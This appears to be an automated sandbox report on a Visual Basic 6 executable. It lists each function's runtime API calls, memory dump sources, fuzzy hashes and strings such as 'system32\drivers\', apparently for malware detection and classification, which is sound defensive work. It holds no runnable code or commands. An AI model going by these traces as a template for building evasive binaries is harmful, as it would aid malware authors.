__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BB9
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BCD
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BDB
#525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BED
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BF8
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C51
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C5E
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C6E
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421C7B
#525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CB9
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CC4
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CD4
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CE1
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CF1
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421CFE
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D20
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D27
#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D56
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D65
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D79
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D87
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D97
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421D9E
#580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DB1
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DC5
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DD3
#525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DE5
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421DF0
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E49
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E56
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E66
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421E73
#525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EB1
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EBC
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ECC
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421ED9
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EE9
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421EF6
#598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F10
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F25
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F2C
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F3C
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F43
__vbaStrCat.MSVBVM60(004086A8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F59
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F64
__vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F71
#600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F87
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F96
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421F9F
#600.MSVBVM60(00004008,00000000), ref: 00421FC5
__vbaFreeStr.MSVBVM60(00422028), ref: 00421FFD
__vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422006
__vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 0042200F
__vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422018
__vbaFreeStr.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00422021
__vbaErrorOverflow.MSVBVM60 ref: 0042203F

Strings

E, xrefs: 00421FA5

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
String ID: E
API String ID: 1020712489-3568589458
Opcode ID: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
Instruction ID: 07c48357a9df06a9d6fdd80bdbc38809ff137e737b5eacf3c703d77614347229
Opcode Fuzzy Hash: 76b9ac4220b8a9f889e2395c6dcac48a977a3f37ee100d0a82cf9b9d0917f290
Instruction Fuzzy Hash: FC22D571900248EBDB04DFE0EA4CBDEBB74FF48305F208169E602BB2A5DBB55A45CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004228E0, Relevance: 54.2, APIs: 36, Instructions: 195COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
#648.MSVBVM60(0000000A), ref: 00422959
__vbaFreeVar.MSVBVM60 ref: 00422968
__vbaI2I4.MSVBVM60(?), ref: 0042297C
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
__vbaI2I4.MSVBVM60 ref: 0042299A
#570.MSVBVM60(00000000), ref: 004229A1
__vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
__vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
#525.MSVBVM60(00000000), ref: 004229EC
__vbaStrMove.MSVBVM60 ref: 004229F7
__vbaI2I4.MSVBVM60 ref: 00422A07
__vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
__vbaI2I4.MSVBVM60 ref: 00422A22
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 00422A4A
__vbaStrCopy.MSVBVM60 ref: 00422A68
__vbaStrMove.MSVBVM60(00000003), ref: 00422A79
#616.MSVBVM60(00000000), ref: 00422A80
__vbaStrMove.MSVBVM60 ref: 00422A8B

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
__vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE

Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE

__vbaStrMove.MSVBVM60(?), ref: 00422AF4
__vbaStrMove.MSVBVM60(00000004), ref: 00422B15
#618.MSVBVM60(00000000), ref: 00422B1C
__vbaStrMove.MSVBVM60 ref: 00422B27
__vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
__vbaI2I4.MSVBVM60 ref: 00422B78
__vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
__vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
__vbaFreeStr.MSVBVM60 ref: 00422BC1
__vbaErrorOverflow.MSVBVM60 ref: 00422BDE

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
String ID:
API String ID: 1066637744-0
Opcode ID: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
Instruction ID: 321561c39fc04c0ddddefdb4371944f0511538a09f439f710ae93618e622a53c
Opcode Fuzzy Hash: 1310a2324c3d0e81e2fafee1945da52a380a74b9ab6bd6eb12e74ada3333a6c7
Instruction Fuzzy Hash: A681D675D00248EFDB04EFA0EA48BDEBBB4FF48705F108169E612B72A0DB745A49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00415AF0, Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 139fileCOMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E

Part of subcall function 004156D0: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
Part of subcall function 004156D0: __vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
Part of subcall function 004156D0: __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
Part of subcall function 004156D0: __vbaFreeStr.MSVBVM60 ref: 0041572D

#580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
#529.MSVBVM60(00004008), ref: 00415B88
#609.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00415BB5
__vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 00415BC0
__vbaVarDup.MSVBVM60 ref: 00415BDA
#709.MSVBVM60(00000000,00406544,000000FF,00000000,?), ref: 00415C0F
#616.MSVBVM60(00000000,00000000), ref: 00415C1C
__vbaStrMove.MSVBVM60 ref: 00415C27
#650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 00415C3A
__vbaStrMove.MSVBVM60 ref: 00415C45
__vbaStrCat.MSVBVM60(00000000), ref: 00415C4C
__vbaStrMove.MSVBVM60 ref: 00415C57
#535.MSVBVM60(00000000), ref: 00415C5E
__vbaStrR4.MSVBVM60 ref: 00415C68
__vbaStrMove.MSVBVM60 ref: 00415C73
__vbaStrCat.MSVBVM60(00000000), ref: 00415C7A
__vbaStrMove.MSVBVM60 ref: 00415C85
__vbaNameFile.MSVBVM60(00000000), ref: 00415C8C
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000), ref: 00415CAC
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000000,004032B6), ref: 00415CBF

Strings

yymmdd, xrefs: 00415BC6

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
String ID: yymmdd
API String ID: 2807397001-2871001947
Opcode ID: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
Instruction ID: da5027675b2f5c6fcc5daed963e92fc9253badbc1f1ecd6ba165b842c6da7c45
Opcode Fuzzy Hash: 0a52f3ea78d8377f9a2e471ac3c9d7155881456b4ba9d1ca500980605009cd58
Instruction Fuzzy Hash: 48511D75900208EFDB04DF94D948BDEBBB8FF48305F108569F506BB2A0DB745A48CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00429CA0, Relevance: 27.1, APIs: 18, Instructions: 104COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
#525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D30
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
#537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
__vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
#616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
__vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5
__vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8
__vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429E05

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$ErrorFree$System$#525#537#616AnsiCopyListOverflowUnicode
String ID:
API String ID: 1601447463-0
Opcode ID: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
Instruction ID: 358cedcb50fb0de278f4ad7536de046e5609ba25d4bc9f82414949036a89438a
Opcode Fuzzy Hash: 06e0597c0c0a64de7a739e86bbd130d0eaa357415623081fa9728b986bb3ce25
Instruction Fuzzy Hash: 46310E71D10219AFDB04EFB5DD89DEEBBB8EF58700F10812AE506B6260DA785905CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041E880, Relevance: 25.6, APIs: 17, Instructions: 78COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
#525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
__vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
GetComputerNameA.KERNEL32(00000000), ref: 0041E91D
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
#537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
__vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
#616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
__vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE
__vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E9C9

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkComputerNameOverflowUnicode
String ID:
API String ID: 3892761589-0
Opcode ID: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
Instruction ID: ddd52465c9ed4945c744d66910b811b9efcc79ef8180f597879438901a225856
Opcode Fuzzy Hash: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
Instruction Fuzzy Hash: 3531ECB5900149EFDB04EFA4DE4DBDEBBB8EB08701F108169E502B62A0DB755A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004156D0, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
__vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
__vbaFreeStr.MSVBVM60 ref: 0041572D

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiErrorFreeSystemUnicode
String ID:
API String ID: 1195834276-0
Opcode ID: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
Instruction ID: 3bfd6651098160e42727f528c249f020de588879550cabcf3784d8fb116c8987
Opcode Fuzzy Hash: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
Instruction Fuzzy Hash: 1A0121B1D00605EFCB04EFB8D94AAEF7BB8EB44700F50466AF515E3290D73899468B95

Uniqueness

Uniqueness Score: -1.00%

Function 00415780, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157BB
__vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157C9
__vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157D4
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157DD

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiErrorFreeSystemUnicode
String ID:
API String ID: 1195834276-0
Opcode ID: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
Instruction ID: 842bb0dc7b1d712480adeb04c5aa04fa762cb34ee96fa383d986c0466198cab9
Opcode Fuzzy Hash: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
Instruction Fuzzy Hash: 580152B1C00605DFCB00EFA8C94AAAF7BB8EB44700F50422AE511E3290D73859428B95

Uniqueness

Uniqueness Score: -1.00%

Function 00403670, Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

#100.MSVBVM60(00403ED4), ref: 00403675

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
Instruction ID: 87d76072f60c1bc7f33af001724cdeb9567c685050ecb4be3524b273619080b8
Opcode Fuzzy Hash: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
Instruction Fuzzy Hash: 805185A680E7C15FC70387704D756557FB0AE23209B2E86EBC4C0DB1E3E2AD590AD766

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00416130, Relevance: 720.3, APIs: 407, Strings: 3, Instructions: 2826COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00416205
__vbaSetSystemError.MSVBVM60 ref: 00416230
__vbaSetSystemError.MSVBVM60 ref: 00416251
__vbaStrMove.MSVBVM60(?), ref: 00416271
__vbaStrMove.MSVBVM60(0042C028), ref: 00416284
__vbaGenerateBoundsError.MSVBVM60 ref: 004162D2
__vbaGenerateBoundsError.MSVBVM60 ref: 00416315
__vbaStrCat.MSVBVM60(00000000,00407CCC,00000000,00000001), ref: 00416350
__vbaStrMove.MSVBVM60 ref: 00416357
__vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0041635F
__vbaStrMove.MSVBVM60 ref: 00416366
__vbaInStr.MSVBVM60(00000001,00000000), ref: 0041636B
__vbaStrCat.MSVBVM60(00000000,00406F58,00000000,00000001), ref: 0041639A
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9

Strings

system\, xrefs: 0041702F, 0041834B, 00418442, 00418946, 00418A3E
system32\drivers\, xrefs: 00416C93, 00417F4F, 0041854A
d/m/yy h:m, xrefs: 00416560, 00417E40

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$Move$System$BoundsFreeGenerateUnlock
String ID: d/m/yy h:m$system32\drivers\$system\
API String ID: 4109330638-2282477228
Opcode ID: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
Instruction ID: d0160703c745c1a143ef53c75ac1b7ca3f1d84f450066f924383876c7bbd0f3b
Opcode Fuzzy Hash: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
Instruction Fuzzy Hash: 93336D71A00219DFCB14DFA4DD84AEEB7B9FF48300F10816AE50AE7265DB749985CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00422F50, Relevance: 684.7, APIs: 386, Strings: 4, Instructions: 2188COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,00000000), ref: 0042317F
__vbaStrCopy.MSVBVM60(?,00000000), ref: 00423187
__vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042318B
__vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000101,?,00000000), ref: 004231B6
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 004231C9
__vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 004231D5
__vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 004231EE
__vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000100,?,00000000), ref: 00423227
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 0042323A
__vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00423246
__vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 0042325F
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00423270
__vbaFreeStr.MSVBVM60(?,00000000), ref: 0042327C
__vbaHresultCheckObj.MSVBVM60(00000000,72A26C4A,004098D4,00000278,?,00000000), ref: 004232A2
__vbaI2I4.MSVBVM60(?,00000000), ref: 004232B1
__vbaHresultCheckObj.MSVBVM60(00000000,72A26C4A,004098D4,0000011C,?,00000000), ref: 004232D1
__vbaHresultCheckObj.MSVBVM60(00000000,72A26C4A,004098D4,00000084,?,00000000), ref: 0042331C
__vbaHresultCheckObj.MSVBVM60(00000000,72A26C4A,004098D4,0000008C,?,00000000), ref: 00423364
